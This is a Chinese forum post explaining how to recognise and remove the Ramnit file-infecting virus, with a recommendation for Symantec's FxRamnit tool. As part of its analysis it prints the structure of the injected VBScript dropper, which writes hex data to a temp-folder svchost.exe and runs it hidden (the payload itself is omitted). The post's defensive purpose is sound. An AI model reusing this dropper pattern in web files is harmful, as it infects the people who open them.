HTML文件自动加入了VBS代码?教你解决Ramnit病毒
说来也是相当奇怪,小编新写的一个html文件,保存关闭后,重新打开就变成了一个超大的文件。自动加入了相当多的VBS代码,很可怕。显然,这是中了Ramnit感染型病毒。没关系,下面小编就教大家怎么杀死Ramnit感染型病毒。图为中招后的文件内容我们从简介图可以看出这是个专门感染web文件的一个病毒,不单单只HTML,可能JS和PHP之类的文件也会感染。
从代码上来看,我们可以看到,这是一个VBS代码,目的是让更多的人去运行(写的数据是十六进制,所以我们也不知道到底会发生什么)。
试想下,我们如果作为web开发人员,把这样的文件传到服务器,会发生什么事(用户打开网站,代码敲敲的运行...)?不敢想象!
代码结构如下:
DropFileName = "svchost.exe"
WriteData = "....................." '十六进制数据
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
OK,话不多说,我们开始来杀毒。
我们需要的是,美国赛门铁克公司提供的Ramnit病毒专杀工具。
下载好后,解压出来是一个叫FxRamnit.exe的工具。
赛门铁克Ramnit病毒专杀工具
Ramnit感染型蠕虫病毒专杀工具 终于出来了 由赛门铁克安全中心近期发布
-------------------------
Ramnit特性:
该病毒杀软一般报:Win32.Ramnit.b或Virus.Ramnit.b····以上两种报毒是由赛门铁克和360安全中心的感染后的EXE报毒名称 该病毒感染全盘EXE HTM HTML DLL文件 感染后的EXE运行后会在该EXE同目录下生成一个55kb或111kb大小的无图标病毒文件(55kb是第一次运行,第二次运行就变成111kb,然后就一直是111kb)感染后电脑会留下后门,电脑全盘EXE HTML HTM DLL文件全部阵亡
-------------------------
说明:
虽然Ramnit病毒是2010年出现的,但是目前还是一款危险度极大的一种病毒,多存在于外挂程序中,各杀毒软件均不能完美修复被感染文件,要么是修复完成后,程序损坏,无法运行,要么根本就没修复成功,基本上杀软的修复也就是删除处理,全盘的EXE和DLL是主要的,删除了系统也基本上废了,所以往常很多人中了该病毒后都是全盘格式化然后重装系统,但是现在不需要了,赛门铁克安全中心推出了一款真正可以实现完美修复系统被Ramnit病毒所感染的文件的工具,很多人用过都叫 好~~有了该款专杀,再也不用担心用外挂中Ramnit病毒了
-------------------------
专杀工具截图:
常见提示:
reboot the system to fuller remove ramnit翻译:重新启动系统以完全删除ramnit
ramnit has not been found on your computer翻译:在您的计算机上找不到ramnit
http://www.admin365.cn/thread-45212-1-1.html DesktopLayer.exe病毒查
http://www.admin365.cn/thread-45211-1-1.htmlHTML感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒解决办法
http://www.admin365.cn/thread-45224-1-1.html HTML文件自动加入了VBS代码?教你解决Ramnit病毒
页:
[1]